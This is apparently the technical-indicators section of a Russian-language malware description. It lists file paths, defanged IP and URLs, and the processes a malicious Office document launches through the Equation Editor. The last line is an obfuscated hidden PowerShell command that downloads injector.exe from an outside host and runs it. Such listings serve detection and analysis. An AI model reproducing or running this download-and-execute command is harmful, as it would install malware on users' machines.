Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\htmlJshon.bat" "
- %APPDATA%\htmljshon.bat
- <Текущая директория>\738f0000
- <PATH_SAMPLE>.xls
- '10#.#73.143.18':80
- http://10#.#73.143.18/sgg/microsoftdecidedtoupdatemywindowsanddeletecachehistorycookiefrompc.Doc
- http://10#.#73.143.18/200/HTMLjshon.bat
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoP"r"o"f"ile -Executi"o"nPolic"y" Bypass -W"i"ndowStyle Hidden -C"o"mmand "I"nv"o"ke-WebReq"u"est http://toss.is/143*LU4S -"O"ut"fi"le in"j"ector.exe; St"art-Process in"j"ector.exe"